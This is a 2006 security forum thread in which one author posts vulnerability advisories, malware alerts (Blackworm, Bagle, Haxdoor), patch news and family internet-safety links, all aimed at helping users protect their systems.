Winamp 5.12 – ZERO Day Exploit for unpatched vulnerability
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Please be careful if you use WinAmp as a media player on your system. A new exploit has surfaced for an unpatched vulnerability that is rated as a critical risk by security firms. The vendor will most likely patch this soon and the patch should be applied expediently.
Winamp Computer Name Handling Buffer Overflow Vulnerability
http://secunia.com/advisories/18649/DESCRIPTION: The vulnerability is caused due to a boundary error during the handling of filenames including a computer name. This can be exploited to cause a buffer overflow via a specially crafted playlist containing a filename starting with an overly long computer name (about 1040 bytes). Successful exploitation allows execution of arbitrary code on a user’s system when e.g. a malicious website is visited. The vulnerability has been confirmed in version 5.12. Other versions may also be affected.
Nullsoft Winamp Player PLS Handling Remote Buffer Overflow Vulnerability
http://www.frsirt.com/english/advisories/2006/0361Advisory ID : FrSIRT/ADV-2006-0361
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-01-29Technical Description: A vulnerability has been identified in Winamp, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing a specially crafted playlist (“.pls” file) containing a malformed “File1” tag, which could be exploited by remote attackers to execute arbitrary commands and take complete control of an affected system without any user-interaction via a specially crafted web page.
Exploits: An exploit is publicly available. It can be found at the FrSIRT site for anyone who wants to review the source code.
Affected Products: Nullsoft Winamp version 5.12 and prior
Solution: The FrSIRT is not aware of any official supplied patch for this issue.
Recommendation: Use Winamp for offline media only or access only highly trusted sites until a patch is issued. It is likely that Nullsoft will quickly supply a patch, but until then use Winamp cautiously.
-
January 30, 2006 at 7:43 pm #3108902
WinAmp 5.13 released to address ZERO DAY exploit
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
-
January 31, 2006 at 3:43 pm #3134615
Blackworm – First reports of damage with incorrect PC clock settings
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
http://www.f-secure.com/weblog/archives/archive-012006.html#00000797
QUOTE: When Nyxem activates, it will overwrite all of your DOC/XLS/PPT/ZIP/RAR/PDF/MDB files. This is nasty, as this is done on all mounted drives, ie. any drive that has a drive letter. So it might affect your USB thumb drives, external hard drives and network drives! Also, if you’re taking daily automatic backups you might end up backing up the corrupted files over good files. The number of machines that have been hit by this worm is over 300,000. Many of those have been disinfected already, though. But thousands of computers will get their files overwritten on February 3rd – most of them in India, Turkey and Peru.
-
January 31, 2006 at 3:43 pm #3134616
Internet Explorer 7 beta released to public
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Microsoft has released a preview of the IE 7 beta for public testing
http://news.zdnet.com/2100-3513_22-6033116.html
QUOTE: Microsoft took the wraps off Internet Explorer 7 Tuesday, releasing the new “preview” version of its Web browser to the general public for testing.
The program, still a work in progress, is available for download from the Internet Explorer section of Microsoft’s corporate Web site, the company said. The company, which began limited testing in July, had promised to deliver a public beta by the end of March.
“The big update is that it’s public,” said Margaret Cobb, group product manager for Internet Explorer at Microsoft. “All previous releases were limited.”
The latest version works only with Windows XP Service Pack 2 and includes many of the features Microsoft has been touting for months. Among them are new security and privacy protection capabilities such as mechanisms designed to combat phishing attacks, spyware and other threats.
-
February 2, 2006 at 5:51 pm #3107939
Unpatched Windows SSDP/UPnP local vulnerability & POC Exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Thankfully, this new vulnerability is not remotely exploitable
Microsoft Windows SSDP and UPnP Services Privilege Escalation Issue
http://www.frsirt.com/english/advisories/2006/0417Advisory ID : FrSIRT/ADV-2006-0417
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Moderate Risk
Remotely Exploitable : No
Locally Exploitable : Yes
Release Date : 2006-02-02EXPLOIT: POC exploit code can be found at FrSIRT
Technical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by malicious users to obtain elevated privileges. This flaw is due to an access validation in the Simple Service Discovery Protocol (SSDP) Discovery and the Universal Plug and Play Device Host (UPnP) services that fail to properly validate user permissions, which could be exploited by local unprivileged attackers to bypass security restrictions and execute malicious programs with elevated privileges.
-
February 3, 2006 at 9:51 am #3133850
New Bagle.DP Variant – “February Price” theme
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
While most companies can effectively block this, it may be tough in cases where ZIP attachments are allowed and AV signature files haven’t been published yet. The golden rule is to never open attachments.
New Bagle.DP Variant – “February Price” theme
http://secunia.com/virus_information/26794/bagle.dp/
http://vil.nai.com/vil/content/v_138366.htmEMAIL FORMAT TO BLOCK OR AVOIDFrom: [SPOOFED]
Subject: price, February priceMessage body: price, February price
Attachment:
price.zip
pricelst.zip
pricelist.zip
price_lst.zip
new_price.zip
21_price.zip
February price.zip
February_price.zip -
February 3, 2006 at 9:51 am #3133851
Mozilla Firefox – New 1.5.0.1 release addresses several security issues
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
All users should update to the latest version of Mozilla Firefox, as several recently discovered security issues have been addressed by this latest release.
http://secunia.com/advisories/18700/
Summary of Security Issues Fixed
Description: Multiple vulnerabilities have been reported in Firefox, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, potentially disclose sensitive information, and potentially compromise a user’s system.
1) Some errors in the JavaScript engine where certain temporary variables are not properly protected may be exploited to execute arbitrary code via a user-defined method triggering garbage collection.
2) An error in the dynamic style handling can be exploited to reference freed memory by changing the style of an element from “position:relative” to “position:static”.
3) An error in the “QueryInterface” method of the Location and Navigator objects can be exploited to cause a memory corruption.
4) An input validation error in the processing of the attribute name when calling “XULDocument.persist()” can be exploited to inject arbitrary XML and JavaScript code in “localstore.rdf”, which will be executed with the permissions of the browser the next time the browser starts up again.
5) Some integer overflows in the E4X, SVG, and Canvas functionalities may be exploited to execute arbitrary code.
6) A boundary error in the “nsExpatDriver::ParseBuffer()” function in the XML parser may be exploited to disclose data on the heap.
7) The internal “AnyName” object of the E4X functionality is not properly protected. This can be exploited to create a communication channel between two windows or frames having different domains.
Solution:
Update to version 1.5.0.1.
http://www.mozilla.com/firefox/Additional CVE References
CVE-2005-4134
CVE-2006-0292
CVS-2006-0293
CVE-2006-0294
CVE-2006-0295
CVE-2006-0296
CVE-2006-0297
CVE-2006-0298
CVE-2006-0299 -
February 4, 2006 at 9:52 am #3097012
Blackworm (CME 24) – Some Damage, but not as widespread as predicted
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
It may also take a couple of days for damage to show up and to collect any meaningful statistics. Our local news reported that some folks got hit in our metropolitan area of 250,000 residents. It was reported that one local PC company was charging $100 to repair systems, so this had an impact on home users.
So far, in monitoring news sources, the overall damage was less than anticipated. I’ve always been an advocate of security awareness, as it’s important to know how malicious individuals can attack. If there were over-exaggerations by the media it was helpful, as folks took got extra measures in preparation, updating and backing up their data.
Below is a cut/paste of Google News headlines, which is good news so far:
GOOGLE NEWS HEADLINES – February 3, 2006Weekend Will Tell Kama Sutra Tale
InformationWeek, NY – 2 hours ago
Because most still-infected computers belong to home
users, the real scale of any data loss caused by the
Kama Sutra worm may not be known until early next week
…
All quiet on the Nyxem front
VNUNet.com, Netherlands – 2 hours ago
Anti-virus companies are seeing very damage from the
Nyxem.E worm that was scheduled to start overwriting
data on infected systems earlier today. …
Researchers fear confusion on worm name
Seattle Post Intelligencer – 3 hours ago
By ANICK JESDANUN. NEW YORK — Friday’s
file-destroying worm goes by “Mywife” at Microsoft
Corp. and McAfee Inc., “Blackmal” at Symantec Corp.
and CA Inc. …
Experts: ‘Hype’ May Have Mitigated Worm
Houston Chronicle, United States – 4 hours ago
By ANICK JESDANUN AP Internet Writer. — Companies
and individuals heeded this week’s warning _ some may
call it “hype” _ about …
Was the Kama Sutra worm overhyped?
CNET News.com, CA – 4 hours ago
The Kama Sutra worm, like so many other virus scares,
reminds us and other bloggers of the Y2K mania, albeit
on a smaller scale. …
Worm Attack Fizzles Out
Red Herring, CA – 4 hours ago
A computer worm dubbed Kama Sutra and other names
infected thousands of machines but failed to cause any
significant loss of data. …
Kama Sutra worm hits home
CNN – 9 hours ago
By Marsha Walton. ATLANTA, Georgia (CNN) — Many
computer users around the globe apparently heeded the
warnings about a worm with …
Kama Sutra virus causes little damage
Boston Globe, United States – 9 hours ago
A man is seen in front of a display of computers in an
undated file photo. A computer virus that was designed
to start its malicious …
Kama Sutra assumes damp squid position
Inquirer, UK – 9 hours ago
THE MUCH HYPED Kama Sutra worm tipped to wreak a trail
of destruction in its wake appears to have instead has
raised hardly a whimper never mind a scream. …
Update 4: File-Destroying Worm Causes Little Damage
Forbes – 10 hours ago
By ANICK JESDANUN , 02.03.2006, 09:26 AM. A
file-destroying computer worm set to activate Friday
caused relatively little damage …
File-destroying worm causes little damage
BusinessWeek – 11 hours ago
FEB. 3 8:43 AM ET A file-destroying computer worm set
to activate Friday caused relatively little damage
during the business day …
Kama Sutra worm threat goes soft
CNET News.com, CA – 11 hours ago
The Kama Sutra worm, designed to begin deleting files
on infected computers this morning, has caused
virtually no damage, according to antivirus firms. …
Feared computer worm not so scary in Asia
CTV.ca, Canada – 11 hours ago
Computer users on this side of the continent must be
crossing their fingers as they boot up, but there have
been no reports of any damage from a malicious worm
…
Asia Escapes File-Destroying Worm
CBS News – 11 hours ago
(CBS/AP) A computer worm expected to begin corrupting
files in infected machines around the world Friday
caused no major damage in the Asian financial centers
…
Computer worm doesn’t bite in Hong Kong, Tokyo
USA Today – 11 hours ago
By Sylvia Hui, Associated Press. HONG KONG — A
computer worm expected to begin corrupting files in
infected machines around the …
Free Removal Tools Released as ‘Blackworm’ Approaches
PC Magazine – 12 hours ago
With the clock ticking on a Feb. 3 D-Day for the
activation of the destructive ‘Blackworm’ worm
payload, anti-virus vendors are …
‘Limited’ damage from Nyxem virus
BBC News, UK – 13 hours ago
The Windows virus was set to start deleting popular
file types on 3 February and was known to have
infected more than 300,000 machines. …
Kama Sutra virus fizzles in Japan, Hong Kong
CBC News, Canada – 13 hours ago
Computer security firms were bracing for a computer
virus on Friday expected to corrupt files on thousands
of computers. But early …
Humanity survives Kama Sutra apocalypse
Register, UK – 14 hours ago
Security watchers reckon the Kama Sutra worm, which is
programed to overwrite files on infected Windows PCs
today, will have a damaging but not catastrophic …
File-destroying worm causes no major damage so far in
Hong Kong …
Calgary Sun, Canada – 15 hours ago
By SYLVIA HUI. HONG KONG (AP) – A computer worm
expected to begin corrupting files in infected
machines around the world Friday has …
Kama Sutra quiet so far
NEWS.com.au, Australia – 20 hours ago
AUSTRALIAN IT security professionals have so far
reported few problems from the so-called Kama Sutra
worm, which was due to begin overwriting files on
infected … -
February 4, 2006 at 6:23 pm #3096904
Internet Storm Center Article: Recovering LOST files from a hardrive
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Backups are always beneficial and as CD media is inexpensive, I usually make double copies which are tested in another PC.
The Blackworm (CME-24) payload included capabilities to delete several types of documents and files. Usually, the best “undelete“ tools or services aren’t free and these links can provide starting points.
Internet Storm Center Article: Recovering LOST files from a hardrive
http://www.incidents.org/diary.php?storyid=1096QUOTE: First if at all possible TURN off the computer and put the infected drive on another system that is not infected. If for one reason or another you can not you should cosider one of the cdrom or floppy based recovery systems and an extra drive. You should preform recovery to a different filesystem then the one being recovered from other wise you risk overwriting some files as you recover others. Be aware some companies offer demos that identifies “lost” files but doesn’t save the files it finds.
-
February 4, 2006 at 6:23 pm #3096903
British Government – Virus Protection Guidelines
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This is an older Best Practices guideline I found while researching that was issued a few years ago. Most of this is still relevant today.
TEXT — HOW TO PROTECT YOURSELF AND YOUR COMPANY FROM COMPUTER VIRUSES
PDF — HOW TO PROTECT YOURSELF AND YOUR COMPANY FROM COMPUTER VIRUSES
-
February 5, 2006 at 5:54 am #3096827
The Family PC — How to stay safe on the Internet.
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
As parents, we have concerns on Internet safety for all of our family members. This morning I spent some time gathering some of the best published resources out there. Most of these are non-technical and easy-to-understand.
Security is a two part process. Part one is the technical protection associated with anti-virus software, firewalls, Windows Updates, Anti-Spyware, etc. Part two is in the human behavior aspects, where security can be seen as SEC-U-R-IT-Y. The “U-R-IT” part means that “You are it”. While the bad guys are the source of the problem, so is ignoring the risk. For example, if you ignore speed limit or stop signs on the highway, you’ll run into trouble. It’s the same way with computer security.
The best advice I have for parents is “To Teach your Children well”. Spend quality time with family members teaching them to avoid email/IM attachments and URLs, recognizing spam (there are no free lunches out there), and most importantly the bad people on the Internet (e.g., predators – which thankfully law enforcement is on the lookout for). The knowledge of Internet risks and how to avoid them is as important as the technical safeguards we employ on our family PCs.
Below are some resources that might help:
SEARCH ENGINES — There are numerous resources of good pages in google, MSN, or other search engines:
http://www.google.com/search?&q=how+to+stay+safe+on+Internet
http://search.msn.com/results.aspx?q=how+to+stay+safe+on+InternetGREAT FAMILY PROTECTION LINKS — I particularly liked these for both children and in fact it applys to all home users:
http://www.staysafe.org/
http://www.sass.ca/safe.htm
http://www.safekids.com/
http://www.safeteens.com/safeteens.htm
http://www.bettybookmark.com/i/internetsafety.htm
http://www.staysafeonline.info/
http://www.chaminade.org/MIS/WebSafety/30ways.htm
http://www.dhs.gov/dhspublic/display?theme=76&content=336
http://familyinternet.about.com/cs/internetsafety1/a/aa8safesteps.htm
http://www.wiredsafety.org/
http://www.bbc.co.uk/cumbria/features/2004/03/internet_safety/index.shtml
http://www.bcentral.co.uk/technology/security/stay-safe-online.mspx
http://www.haltabuse.org/resources/online.shtml
http://www.hubbardtwppd.org/Homeland/online.htmSAFETY QUIZ — Below is a 10 question Internet safety quiz that your family members can take in just a couple of minutes:
http://www.iol.ie/~dromore/safety/quiz/quiz.htm
OTHER GREAT RESOURCES – I’ve always liked the work done by MS “at home”, CERT, and Kim Komando:
http://www.microsoft.com/athome/security/default.mspx
http://www.cert.org/tech_tips/home_networks.html
http://www.komando.com/ -
February 7, 2006 at 6:43 am #3093184
Microsoft HTML Workshop product – New unpatched vulnerability & POC exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This development tool is part of an SDK that can help Client/Server or web developers in authoring help screens for applications. This unpatched exploit is rated moderately critical and an exploit has been published.
Microsoft HTML Help Workshop “hhp” File Handling Buffer Overflow Issue
http://secunia.com/advisories/18740/
http://www.frsirt.com/english/advisories/2006/0446Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-02-06Exploits: POC exploit published at FrSIRT’s site
Affected Products: Microsoft HTML Help Workshop version 4.74.8702.0 and prior
Solution: Do not open untrusted “.hhp” files, as an there are no officially supplied patch for this issue yet.
Technical Description: A vulnerability has been identified in Microsoft HTML Help Workshop, which could be exploited by attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing a specially crafted “.hhp” file containing an overly long “Contents file” field, which could be exploited by remote attakers to compromise a vulnerable system by convincing a user to open a malicious “.hhp” file.
-
February 7, 2006 at 6:43 am #3093183
CAIDA – An Excellent Analysis of Blackworm’s Impact
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This is some of the best documentation I’ve seen in providing a comprehensive analysis for a major new virus. The link below from CAIDA is chockful of charts, graphs, and facts. I’m glad that actual damages for the payload triggered on February 3rd were significantly less than predicted.
CAIDA — The Nyxem Email Virus: Analysis and Inferences
http://www.caida.org/analysis/security/blackworm/ -
February 7, 2006 at 6:43 pm #3133095
Safer Internet Day 2006
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
The following are links related to “Safer Internet Day”. This is a good initiative in providing security awareness for home users.
Europe’s Internet safety information resource
http://www.saferinternet.org/ww/en/pub/insafe/index.htmInternet Safety Home Page
http://www.saferinternet.org/ww/en/pub/insafe/safety.htmQUOTE: ‘Safer Internet Day’, the initiative is designed to raise awareness of cyber threats. The target audience in this case, however, isn’t the corporate IT-type, but users, specifically targeting parents and children. This year’s Safer Internet Day attempts to ride on the coattails of success of blogging and will distribute its message using exactly the same vehicle.
Activities
Blogging
Chat
Instant Messaging
Mobiles
Online gaming
Online shopping
Issues
Cyberbullying
Gambling
Gaming
Hate speech / racism
Privacy
Phishing
Spam
Spyware
Virus
Useful Info
SAFT guide for parents
Council of Europe Handbook
To surf in safe waters
Insafe newsletter -
February 8, 2006 at 6:43 am #3132902
Sun Java – Security Release for critical vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Users with Sun Java installed should update their systems to protect their brower and PC environment from malicious websites that could affect security controls.
Sun Java Runtime Environment Sandbox Security Bypass Vulnerabilities
http://www.frsirt.com/english/advisories/2006/0467Advisory ID : FrSIRT/ADV-2006-0467
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-02-08Technical Description: Seven vulnerabilities were identified in Sun Java JRE (Java Runtime Environment), which could be exploited by malicious web sites to compromise a vulnerable system. These flaws are due to errors in the “reflection” APIs, which could be exploited by attackers to read, write, and execute arbitrary files by convincing a user to visit a specially crafted web page containing a malicious applet.
Affected Products
JDK 5.0 Update 4 and prior
JRE 5.0 Update 4 and prior
SDK 1.4.2_09 and prior
JRE 1.4.2_09 and prior
SDK 1.3.1_16 and prior
JRE 1.3.1_16 and priorSolution:
JDK and JRE 5.x – Upgrade to JDK and JRE 5.0 Update 6 :
http://java.sun.com/j2se/1.5.0/download.jspSDK and JRE 1.4.x – Upgrade to SDK and JRE 1.4.2_10 :
http://java.sun.com/j2se/1.4.2/download.htmlSDK and JRE 1.3.x – Upgrade to SDK and JRE 1.3.1_17 :
http://java.sun.com/j2se/1.3/download.htmlReference
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102171-1 -
February 13, 2006 at 7:51 am #3133608
Windows ACL Privilege Escalation – New Exploit Developed
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
System administrators should review this exposure carefully if they are using older versions of XP. Moving to XP SP2 is beneficial as it offers a number of security improvements. Companies should test their applications to ensure they are compliant as the stricter levels of security could create issues for poorly written applications. Still, upgrading to SP2 is worthwhile and goes smoothly in most cases.
Microsoft Windows Service ACLs Local Privilege Escalation Vulnerability
http://www.frsirt.com/english/advisories/2006/0417Technical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by malicious users to obtain elevated privileges. This flaw is due to insecure default access controls where the “Authenticated Users” group is granted permissions to modify Simple Service Discovery Protocol (SSDP) and Universal Plug and Play Device Host (UPnP) service configurations, which could be exploited by local unprivileged attackers to change the default binary that is associated with an affected service and execute malicious programs with elevated privileges.
Solution: Upgrade to Microsoft Windows XP SP2 or Microsoft Windows Server 2003 SP1, or change the default ACLs:
http://www.microsoft.com/technet/security/advisory/914457.mspx
-
February 14, 2006 at 4:44 pm #3254416
New Bagle Virus – Olympic-themed variant
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
The social engineering approach used by this latest version of the Bagle virus continues to prove that “if it’s too good to be true, then it’s not. It’s always beneficial to avoid opening any suspicious attachment or URL link.
New Bagle Virus – Olympic-themed variant
http://www.f-secure.com/weblog/archives/archive-022006.html#00000809
http://vil.nai.com/vil/content/v_138528.htm -
February 16, 2006 at 7:11 pm #3091557
MS06-005 proof of concept exploit released
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
MS06-005 proof of concept exploit released
http://www.incidents.org/diary.php?storyid=1126QUOTE: The proof of concept exploit for MS06-005 has been released. The exploit craft a malicious BMP file to perform buffer overflow in Media Player. Keeping in mind as Microsoft has pointed out that the exploiting factor can include other graphics file as well (such as .wmp), it’s a good idea to get it patched ASAP.
-
February 19, 2006 at 11:56 am #3252969
Microsoft Security updates for February 2006 – New Media Player exploits emerge
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Below are some new exploits MS06-05 and MS06-06 that emerged shortly after Microsoft’s “Patch Tuesday” updates on Valentines Day. Where malicious code is easy to develop by the bad guys, the timeframe for reverse engineering is moving from hours and days instead of a couple of weeks. Please update your systems promptly if you haven’t had a chance to do this yet.
FOUR NEW EXPLOITS FROM FEBRUARY UPDATES – from FrSIRT’s website:
2006-02-17 : Microsoft Windows Media Player 10 Plugin Remote Code Execution Exploit (MS06-006)
2006-02-17 : Microsoft Windows Media Player 9 Plugin Remote Code Execution Exploit (MS06-006)
2006-02-16 : Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005) #2
2006-02-15 : Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)Microsoft Security Bulletin Summary for February, 2006
http://www.microsoft.com/technet/security/bulletin/ms06-feb.mspx -
February 26, 2006 at 9:42 am #3271758
Apple Mac OS System X – Critical Vulnerability and published Exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Apple will most likely patch this vulnerability soon and Mac users should look for any System X updates. Just as in the Windows environment, everyone needs to be careful of any suspicious email attachments, email URL links, or unfamiliar websites.
Apple Mac OS X Metadata Handling Remote Shell Execution Vulnerability
http://www.frsirt.com/english/advisories/2006/0671
http://secunia.com/advisories/18963/Description: The vulnerability is caused due to an error in the processing of file association meta data in ZIP archives (stored in the “__MACOSX” folder) and mail messages (defined via the AppleDouble MIME format). This can be exploited to trick users into executing a malicious shell script renamed to a safe file extension stored in a ZIP archive or in a mail attachment. This can also be exploited automatically via the Safari browser when visiting a malicious web site.
Exploit: One exploit has been published and the code can be reviewed at the FrSIRT site
Patches: None published so far
Workarounds: Do not open files in archives or mail attachments originating from untrusted sources. The vulnerability can be mitigated by disabling the “Open safe files after downloading” option in Safari.
-
February 26, 2006 at 9:42 am #3271757
Linux/UNIX – New version of Mare worm circulating
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
UNIX_MARE.F Reported by Trend Micro ELF_MARE.E Reported by Trend Micro
This executable Linux file (ELF) propagates by taking advantage of the XML-RPC for PHP Remote Code vulnerability.
-
February 26, 2006 at 9:42 am #3271756
Macromedia ShockWave Player ActiveX Installer Buffer Overflow
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
A new vulnerability has been discovered for Macromedia’s Shockwave player that occurs only during install processing. Never install any software by email as virus writers may try to exploit this new vulnerability. Always install software directly from the vendors web site.
Macromedia ShockWave Player ActiveX Installer Buffer Overflow
http://secunia.com/advisories/19009/Description: The vulnerability is caused due to a boundary error in the Installer ActiveX control. This can be exploited to cause a stack-based buffer overflow via overly long values passed in two specific parameters to the control. Successful exploitation allows arbitrary code execution, but requires that the user is e.g. tricked into visiting a malicious web site that prompts the user to install Shockwave Player. The vulnerability has been reported in versions 10.1.0.11 and prior.
Workaround: The vendor has reported that the vulnerability occurs only during the installation process, and no action needs to be taken by current users.
Solution: Only install ShockWave Player directly from the vendor’s web site.
-
February 27, 2006 at 5:42 am #3273208
Bagle.DW – Disguised as Software Cracking program
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This new downloader version of Bagle pretends to be a software cracking program, but it attempts to download malicious content from the Internet.
Bagle.DW – Disguised as Software Cracking program
http://vil.nai.com/vil/content/v_138710.htm
http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.dv.htmlW32/Bagle.dw is a trojan downloader that attempts to download and execute files from various compromised websites. As the website being communicated is normally controlled by the malware author, any files being downloaded can be remotely modified and the behavior of these new binaries altered – possibly with every user infection.
At the time of writing this description, McAfee AVERT did not see the downloading of any files as they may have been moved or deleted at the remote site. W32/Bagle.dw that was mass spammed on February 25th, 2006.
-
February 27, 2006 at 5:42 am #3273207
Haxdoor – Advanced Rootkit design
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This article by F-Secure describes one of the most advanced root kit design. With kernel mode networking API hooks it even has the potential to compromise SSL based security.
http://www.f-secure.com/weblog/archives/archive-022006.html#00000821
QUOTE: Haxdoor is one of the most advanced rootkit malware out there. It is a kernel-mode rootkit, but most of its hooks are in user-mode. It actually injects its hooks to the user-mode from the kernel — which is really unique and kind of bizarre. We took a careful look at Backdoor.Win32.Haxdoor.gh (detection added 31 Jan, 2006). It hooks HTTP functionality, redirects traffic, steals private information, and transmits the stolen data to a web-server controlled by the attacker. Most (all?) online banks use SSL encrypted connections to protect transmissions. If Haxdoor would hook networking functionality in the kernel, it would have hard time phishing since the data would be encrypted. By hooking on a high-enough API level it is able to grab the data before it gets encrypted.
-
February 28, 2006 at 5:42 am #3088133
Snow.A – File infector virus impacts *.EXE files
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Please be careful with all EXE files in email or other sources. So far this new PE based virus is low-risk.
Snow.A – File infector virus impacts *.EXE files
http://vil.nai.com/vil/content/v_138727.htmThis detection is for a Win32 parasitic virus variant that infects Windows portable executable (PE) files.
W32/Snow.a bears the following characteristics:
1. infects PE executable files
2. infected files grow in length by about 243 kilobytes
3. drops and install WinPcap network drivers
4. drops and auto-starts a copy of itself
5. when an infected file is run, the virus searches for other files to infect on both local and network drives
6. flood network with spoofed arp packets (arp poisoning) -
February 28, 2006 at 5:42 am #3088132
New IE exploit targets older unpatched builds
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
FrSIRT is reporting a brand new IE exploit targeted to XP SP0 (Gold) that appears to be patched in XP SP1 or higher, as well as W/2000 SP4. Still, there might be some folks running “Gold” (and especially W/2000 SP3 in the corporate world) … More can be found at FrSIRT’s site
Microsoft Internet Explorer “IsComponentInstalled()” Remote Stack Overflow Exploit
Date : 28/02/2006
Rated as : Critical
Note : This vulnerability has reportedly been fixed in Windows XP SP1 and Windows 2000 SP4# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com. -
March 4, 2006 at 7:01 pm #3085787
New Bagle variant with “lawsuit theme” spreading
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
The social engineering approach of “you did something wrong” can cause folks to drop their guard … According to McAfee, the web based malware download sites seem to be shutdown, which thankfully happens quickly after these attacks are launched.
New Bagle variant with “lawsuit theme” spreading
http://vil.nai.com/vil/content/v_138776.htmQUOTE: McAfee AVERT has observed instances of this threat,infected with W32/Sality, spreading in the wild. W32/Bagle.dy@MM is a trojan downloader and mailing worm that uses its own SMTP engine to send itself to the email addresses that it harvests on the infected computer.
-
March 5, 2006 at 7:01 pm #3085088
ICABDI.A – New POC Microsoft Infopath XSN file infector
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
This new proof-of-concept virus has some errors in the code and primarily represents a brand new area of attack, as the 1st virus to infect XSN file extensions. AV vendors are responding with protection as Trend and Symantec have released signature files to address this new exposure.
ICABDI.A – New POC Microsoft Infopath XSN file infector
http://secunia.com/virus_information/27382/icabdi.a/QUOTE: This is the Trend Micro detection for the proof-of-concept malware that attempts to infect Microsoft Infopath .XSN files. Infopath is an application used to develop XML-based user forms. It creates a temporary folder named iCab. It then copies a target XSN file that it attempts to infect in the said folder. The contents of the file are then extracted.
To infect the XSN file, it inserts a malicious script inside the script.js of the target XSN file. To clean up traces of its malicious routine, it then attempts to recreate the original (already infected) file, and then delete iCab and all its contents. However, due to errors in its code, it is unable to perform its file infection and cleanup routines.
-
March 5, 2006 at 7:02 pm #3085087
Microsoft Visual Studio DBP/SLN File Handling Buffer Overflow
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
The following new buffer-overflow vulnerability is currently unpatched and could be crafted by the bad guys into a future exploit. Developers should exercise caution with untrusted DBP/SLN files.
Microsoft Visual Studio DBP/SLN File Handling Buffer Overflow
http://www.frsirt.com/english/advisories/2006/0825Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-03-05Technical Description: A vulnerability has been identified in Microsoft Visual Studio and Microsoft Visual InterDev, which could be exploited by attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing specially crafted Database Project (.dbp) or Solution (.sln) files containing an overly long “DataProject” field, which could be exploited by attackers to compromise a vulnerable system by tricking a user into opening a malicious “.dbp” or “.sln” file.
Affected Products
Microsoft Visual Studio version 6.0 SP6 and prior
Microsoft Visual InterDev version 6.0 SP6 and priorSolution: The FrSIRT is not aware of any official supplied patch for this issue.
-
March 8, 2006 at 6:43 am #3086883
Hotmatom Worm – New MSN Hotmail based worm deletes files
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
This is a worm written in VB with the following characteristics:
1. The worm attempts to lure victims to follow a URL link, in so doing downloading a copy of it, and infecting themselves. It monitors Internet Explorer windows in order to detect when a new message is being created within MSN Hotmail.
2. The worm monitors browser window to detect when MSN hotmail is being used for sending new mail, and inserts text to such messages, which contains a URL from where the worm is downloaded if the recipient clicks on the link.
3. It deletes files on the root of C: and A:, and copies itself there in place of those files, appending a .EXE file extension[/quote]
Hotmatom Worm – New MSN Hotmail based worm deletes files
http://secunia.com/virus_information/27456/hotmatom/
http://vil.nai.com/vil/content/v_138829.htm
http://www.sarc.com/avcenter/venc/data/w32.hotmatom.html -
March 10, 2006 at 9:02 pm #3267570
McAfee – DAT 4715 False positive fixed with 4716
by harry waldron, cpcu, ccp · about 18 years ago
In reply to Harry Waldron
DAT 4716 was released to quickly address scanning errors that created false positive issues in release 4715. The CTX virus was being detected for files that truly aren’t infected with a virus.
-
April 11, 2006 at 11:26 am #3286655
Micrsoft Security Updates – April 2006
by harry waldron, cpcu, ccp · about 17 years, 11 months ago
In reply to Harry Waldron
